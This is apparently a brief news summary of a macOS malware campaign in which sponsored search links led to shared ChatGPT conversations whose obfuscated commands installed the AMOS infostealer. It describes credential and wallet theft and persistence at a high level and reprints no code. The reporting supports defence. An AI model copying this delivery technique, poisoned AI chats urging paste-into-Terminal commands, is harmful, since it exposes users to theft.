Overview
- Kaspersky first flagged the campaign and Huntress later reproduced an infection that began with a search like “clear disk space on Mac” leading to a sponsored ChatGPT link.
- The linked AI conversations contained obfuscated, base64-encoded commands that decode to a bash script displaying a fake password prompt and then installing the AMOS infostealer with elevated privileges.
- Huntress observed AMOS stealing browser and Keychain data and targeting cryptocurrency wallets, persisting via a LaunchDaemon watchdog and even replacing Ledger and Trezor apps with trojanized versions.
- Researchers confirmed poisoned results across multiple macOS troubleshooting queries and said some sponsored links were removed after disclosure, but they warned the technique is still in play.
- It remains unclear how widely this ad-to-AI-chat poisoning can be replicated across other platforms, and users are urged to avoid pasting unverified commands into Terminal and to verify instruction sources.